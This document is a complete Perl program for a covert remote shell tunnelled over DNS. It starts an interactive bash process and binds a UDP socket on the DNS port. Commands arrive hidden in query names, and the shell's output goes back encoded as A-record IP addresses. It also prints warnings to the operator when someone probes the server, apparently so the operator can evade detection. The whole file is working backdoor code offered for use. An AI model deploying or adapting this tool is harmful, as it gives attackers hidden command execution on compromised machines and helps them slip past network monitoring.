#!/usr/bin/perl -w

#CHOOSE THE RIGHT 'stty' COMMAND
#for most linux
system "stty", '-icanon', 'eol', "\001";
#some other systems will need one of these:
#system "stty cbreak </dev/tty >/dev/tty 2>&1";
#system "stty -cbreak </dev/tty >/dev/tty 2>&1";
#system "stty", 'icanon', 'eol', '^@';

$domain = ".test.domain.example";

#DONT CHANGE BELOW HERE
$| = 1;

# VARIABLES
# Buffer - so we can type ahead
$established = 0; # is a connection established?

require 'dns.pl';
use IPC::Open3;
use Symbol;
use Sys::Hostname;
use Socket;
use Fcntl;

#socketpair SOCKET1,SOCKET2,AF_UNIX,SOCK_STREAM,0 || die "Can't create duplicate sockets\n";

$WTR = gensym();
$RDR = gensym();

$pid = open3($WTR, $RDR, "", '/bin/bash -i');

print "started shell at $pid\n";

$iaddr = gethostbyname(hostname());
$proto = getprotobyname('udp');
$port = getservbyname('domain', 'udp');
$paddr = sockaddr_in($port, $iaddr);
socket(IN_UDP, PF_INET, SOCK_DGRAM, $proto)   || die "socket: $!";
bind(IN_UDP, $paddr)                          || die "bind: $!";

while (1){
	$rin = '';
	vec($rin,fileno(IN_UDP),1) = 1;
	vec($rin,fileno($RDR),1) = 1;
	$nfound = select($rout=$rin,undef,undef,100);
	if ($nfound == 0){
		print "didn't get any data after 100 seconds!\n";
		kill ("TERM",$pid) || die "cannot kill $pid\n";
		exit(1);
	} elsif (vec($rout,fileno($RDR),1)){
#		push @typebuffer,<>;
		if (sysread($RDR, $byte, 1) == 1) {
			push @typebuffer,$byte;
		} else {
			print "Can't read from shell\n";
			exit;
		}
#debug	print "Now have $#typebuffer characters\n";
#debug	print "got a TCP packet\n";
	} elsif (vec($rout,fileno(IN_UDP),1)){
#debug print "got a udp packet\n";
		&respond;
	}
}

# this borrows heavily on lbnamed - thanks to them.... and see their
#	copyright info in 'COPYRIGHT'
sub respond
{

($from = recv(IN_UDP, $inpacket, 8192, 0)) || 
		print STDERR "\nPROBLEM UDP receive: $!\n";

$packetlen = length($inpacket);

# if we get a short packet
if ($packetlen <= &dns'HEADERLEN){
		print STDERR "\nPROBLEM Got a short DNS request\n";
		return;
}

$header     = substr($inpacket,0,&dns'HEADERLEN);
$question   = substr($inpacket,&dns'HEADERLEN);
$ptr        = &dns'HEADERLEN;

#($id,$flags,$qdcount,$ancount,$nscount,$arcount) = unpack("n6 C*",$header);
($id,$flags,undef,undef,undef,undef) = unpack("n6 C*",$header);
$qr     = ($flags & &dns'QR_MASK) >> &dns'QR_SHIFT;
#$opcode = ($flags & &dns'OP_MASK) >> &dns'OP_SHIFT;
#$tc     = ($flags & &dns'TC_MASK) >> &dns'TC_SHIFT;
#$rd     = ($flags & &dns'RD_MASK) >> &dns'RD_SHIFT;

if ($qr) {
	print STDERR "\nPROBLEM Got a non-query packet! Are you mumbling",
			"to yourself again?\n";
	return;
}

# checks we can understand the packet
if ( &dns'dn_expand(*inpacket,$ptr,*qname,*comp_len)==0) {
	print STDERR "PROBLEM Got a currupt packet?\n";
	$flags |=  &dns'QR_MASK | &dns'AA_MASK | &dns'FORMERR;
	$response = pack("n n n n n n",$id,$flags,1,0,0,0);
	$response .= $question;
	send(IN_UDP,$response,0,$from) || die "PROBLEM Can't send reply $!\n";
	return;
}

$qclass = '';
$ptr += $comp_len;
($qtype,$qclass) = unpack("n n",substr($inpacket,$ptr,4));

if ($qtype != &dns'T_A) {
	printf STDERR "\n!IIIIIIIINCOOOOOMING!\n",
			,"SOMEONE IS DOING CHECKS ON US - we ",
			"got a request for a non A-record... $qtype\n",
			"Time to leave?\n";
	$response = pack("n n n n n n",$id,$flags,1,0,0,0);
	$response .= $question;
	send(IN_UDP,$response,0,$from) || die "PROBLEM Can't send reply $!\n";        return;
}

#$ptr += $comp_len+4;
#if ($ptr != $packetlen) {
#	printf STDERR "PROBLEM Not at end of packet?\n";
#	$flags |=  &dns'QR_MASK | &dns'AA_MASK | &dns'FORMERR;
#	$response = pack("n n n n n n",$id,$flags,1,0,0,0);
#	$response .= $question;
#	send(IN_UDP,$response,0,$from) || die "PROBLEM Can't send reply $!\n";
#	return;
#}

#debug print "Got a query for $qname\n";

if ($qname =~ /$domain$/) {
#	$lasttime = time;
	@names = split(/\./,$qname);
	if ($names[0] eq 'connect') {
		if ($established) {
			print STDERR "PROBLEM Someone is trying to connect",
				"but there's an established connection?\n";
			return;
		} else {
			print "HELLO! Someone just established a connection\n";
			$established = 1;
			$last_seq = $names[1];
			$initial_seq = $last_seq;
			$last_sendcount = 0;
			$junk = 0;$junk = &sendit($id,inet_aton("1.1.1.1"),0);
			if ($junk) {
				print STDERR "PROBLEM Can't reply to ",
					"connect request\n";
				$established = 0; $last_seq = 0;
				print STDERR "returned $junk\n";
			}
			return;
		}
    	}
	if ($established) {
		if (($#names == 5) ||($names[0] eq 'poll')||($names[0] eq 'exit'))
		{
			if ($names[1] == $last_seq){
				&dochars(0);
			} elsif ($names[0] eq 'exit'){
				kill ("TERM",$pid) || die "cannot kill $pid\n";
				print "got a request to exit\n";
				&dochars(1); #just need to return a result
				exit;
			} elsif ($names[1] == ($initial_seq+1)){
				if ($names[0] ne 'poll'){
					printf $WTR "%c",$names[0] || die "can't write to shell\n";
					}
				&dochars(0);
				$last_seq = $names[1];
			} elsif ($names[1] == ($last_seq + 1)){
				if ($names[0] ne 'poll'){
					printf $WTR "%c",$names[0] || print "can't write to shell\n";
				}
				&dochars(1);
				$last_seq = $names[1];
			}
		} else {
			print "PROBLEM Got a packet with the wrong \$#names\n";
			print "has $#names instead of 5\n";
		}
	}
} else {
	print STDERR "Problem - got a packet that's not for \$domain ",
			"did you set it correctly?\n";
	sendit ($id,'',1);
	return;
}

#end of function
}

# This calls sendit with the right number of characters - if sendit
#	fails dochars puts them back in the buffer to be sent the
#	next time
# It packs as much typing into each response as it can since the
#	'polls' that arrive can be slow...
# Bugs - you can't send a 'null' character - it's reserved...
sub dochars {
local($acked) = @_;
local($count);
local($tempstring);

#debug print "got a query\n";
$count = 0;

if ($acked) {
	while ($count <= $last_sendcount){
#debug		print "\nshifting! - $count:$last_sendcount\n";
		shift @typebuffer;
		$count++;
	}
	$last_sendcount = -1;
}

#debug print "\$#typebuffer = $#typebuffer\n";
if ($#typebuffer < 0) {
	$sendvalue = inet_aton("0.0.0.0");
	sendit ($id,$sendvalue,0);
	$last_sendcount = -1;
#debug print "sending back null since we have no characters in the buffer\n";
	return;
}

if ($#typebuffer >= 3) {
#debug	printf "\n\$typebuffer[0] = $typebuffer[0]\n";
	$sendvalue = inet_aton(sprintf "%s.%s.%s.%s", ord($typebuffer[0]),ord($typebuffer[1]),ord($typebuffer[2]),ord($typebuffer[3]));
	$last_sendcount = 3; #set to the last char sent in typebuffer
	sendit ($id,$sendvalue,0);
} else {
	$count = 0;
#debug	print "\n\$#typebuffer = $#typebuffer\n";
	$tempstring = '';
	while ($count <= $#typebuffer) {
#debug		print "$count: ",ord($typebuffer[$count]),"-\n";
		$tempstring = sprintf "%s%s.",$tempstring,ord($typebuffer[$count]);
		$count++;
	}
	$tempstring =~ s/\.$//;
	$count = 0;
#debug	print "adding 0's\n";
	while ((3 - $#typebuffer) > $count) {
		$tempstring = sprintf "%s.%s", $tempstring, 0;
		$count++;
	}
	@junkme = split(/\./,$tempstring);
	if ($#junkme != 3){
		print "ERROR - $#typebuffer\n";
		print "ERROR - $tempstring\n";
	}
#debug	print "going to send -$tempstring-\n";
	$sendvalue = inet_aton("$tempstring");
	$last_sendcount = $#typebuffer;
	sendit ($id,$sendvalue,0);
}

# end of function
}

# sends the characters
sub sendit {
local($id,$answer,$errortype) = @_;

#debug print "sending packet\n";
#debug print "sending -$answer-\n";

if ($errortype == 1){
	$flags |=  &dns'QR_MASK | &dns'AA_MASK | &dns'NOERROR;
	$qtype = 1; $qclass = 1;
	$response = pack("n n n n n n",$id,$flags,1,1,0,0);
	$response .= &dns'aaa_section(pack("n",0xc00c), $qtype, $qclass, 0,
					$answer);
	send(IN_UDP,$response,0,$from) || return 1;
} else {
	$flags |=  &dns'QR_MASK | &dns'AA_MASK | &dns'NOERROR;
	$qtype = 1; $qclass = 1;
	$response = pack("n n n n n n",$id,$flags,1,1,0,0);
	$response .= $question;
	$response .= &dns'aaa_section(pack("n",0xc00c), $qtype, $qclass, 0,
					$answer);
	send(IN_UDP,$response,0,$from) || return 1;
}

return;
# end of function
}
